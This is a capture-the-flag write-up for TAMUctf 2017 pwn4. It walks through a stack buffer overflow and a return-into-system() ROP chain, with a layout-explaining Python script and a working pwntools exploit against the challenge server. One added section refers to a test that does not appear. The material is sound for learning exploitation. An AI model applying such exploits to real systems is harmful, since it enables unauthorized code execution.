nc web.ctf.tamu.edu 4324
I didn't like echoing inputs anyways.
(You do not need to get a shell to get the flag)
Solution
This one was fun. Again, you can start by triggering a buffer overflow with 11 bytes of junk, and there is a flag_func() which prints the flag. If you try the obvious, overwriting the saved return address with the address of flag_func(), it works locally.
But when you try to retrieve the flag remotely you discover that you've been trolled :)
Ok, let's take a closer look at the program. Disassembling flag_func(), we can see that it reads the contents of the file flag2.txt and cats it for us:
Did you really think it would be that easy?
What we need is the content of flag.txt. There are some tricks to get rid of that 2 and cat the right flag file, but there is already a string in memory with /bin/cat flag.txt, so we can reuse it as-is.
So what our exploit needs to do is a basic ROP:
- return into flag_func(), but at its call to system() (located @0x080484d9) rather than at its start, i.e. past the push of the flag2.txt string
- leave 0x0804a028, the address of the existing /bin/cat flag.txt string, right after that return address on the stack: the call instruction pushes its own return address, so that slot is exactly where system() expects its first argument ([esp+4] on entry)
The saved return address sits 16 bytes into the buffer, which is what the final exploit pads with.
Exploit layout
OVERFLOW (16 bytes) + CALL_SYSTEM_ADDRESS (0x080484d9) + STRING_ADDRESS (0x0804a028)
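To make the stack layout concrete, here is an added example of mine (not part of the original writeup) that builds the payload with plain struct instead of pwntools and models what system() will read as its argument once the overwritten return address has been consumed. The offset of 16 and the two addresses 0x080484d9 and 0x0804a028 are the ones from the exploit; the system@plt address 0x080483e0 used in the second variant is an assumed value for illustration only. It goes a little beyond the page by contrasting the two 32-bit layouts: returning into a `call system` inside flag_func(), where the call instruction pushes the return address for you, versus returning straight to system@plt, which needs a fake return slot before the argument.

```python
import struct

# Addresses from the pwn4 writeup (CALL_SYSTEM inside flag_func, string in .data).
CALL_SYSTEM_ADDR = 0x080484d9
CAT_FLAG_STR = 0x0804a028
OFFSET = 16
# Assumed value, only to illustrate the ret2plt variant; not from the binary.
ASSUMED_SYSTEM_PLT = 0x080483e0


def p32(value):
    """Pack a 32-bit little-endian word, like pwntools' p32."""
    return struct.pack("<I", value & 0xffffffff)


def ret_to_call_site(offset, call_system_addr, arg_addr):
    """Layout used against pwn4: return into the `call system` instruction.

    The call pushes its own return address, so the word right after
    call_system_addr on the stack becomes system()'s first argument.
    """
    return b"A" * offset + p32(call_system_addr) + p32(arg_addr)


def ret_to_system_plt(offset, system_plt, arg_addr, fake_ret=0x41414141):
    """Classic ret2plt layout: jump to system@plt itself.

    Nothing pushes a return address on our behalf, so a fake one must sit
    between the target and the argument, or the argument lands one slot off.
    """
    return b"A" * offset + p32(system_plt) + p32(fake_ret) + p32(arg_addr)


def simulate_system_arg(payload, offset, via_call):
    """Return the word system() sees at [esp+4] on entry, or None if missing.

    Models a 32-bit stack after `ret` pops the overwritten return address:
    via_call=True means the target is a `call system` (which pushes one
    more word), via_call=False means we land directly in system@plt.
    """
    stack = payload[offset:]
    usable = len(stack) - len(stack) % 4
    words = [struct.unpack("<I", stack[i:i + 4])[0] for i in range(0, usable, 4)]
    remaining = words[1:]          # words[0] was consumed by ret (new EIP)
    idx = 0 if via_call else 1     # call pushes ret -> arg is next word; plt -> skip fake ret
    return remaining[idx] if idx < len(remaining) else None


if __name__ == "__main__":
    payload = ret_to_call_site(OFFSET, CALL_SYSTEM_ADDR, CAT_FLAG_STR)
    print(payload.hex())
    print(hex(simulate_system_arg(payload, OFFSET, via_call=True)))
```

Before trusting the string address on a real target, confirm it is in the binary: with pwntools, next(elf.search(b'/bin/cat flag.txt')) should give 0x804a028, and the address of the call to system() should be read off the disassembly of flag_func() (objdump -d pwn4 | grep -B1 -A1 'call.*system'). The last assertion in the test below shows the failure mode: using the ret2plt layout against a call site hands system() the fake return word instead of the string.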
Final remote exploit
## Solution for TAMUctf 2017 : pwn200-pwn4
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
from pwn import *

r = remote('web.ctf.tamu.edu', 4324)
elf = ELF('./pwn4')

payload = b"A" * 16          # padding up to the saved return address
payload += p32(0x80484d9)    # return into flag_func()'s call to system()
payload += p32(0x804a028)    # read by system() as its argument: "/bin/cat flag.txt"
payload += b"AAAA"           # filler
r.sendline(payload)
r.interactive()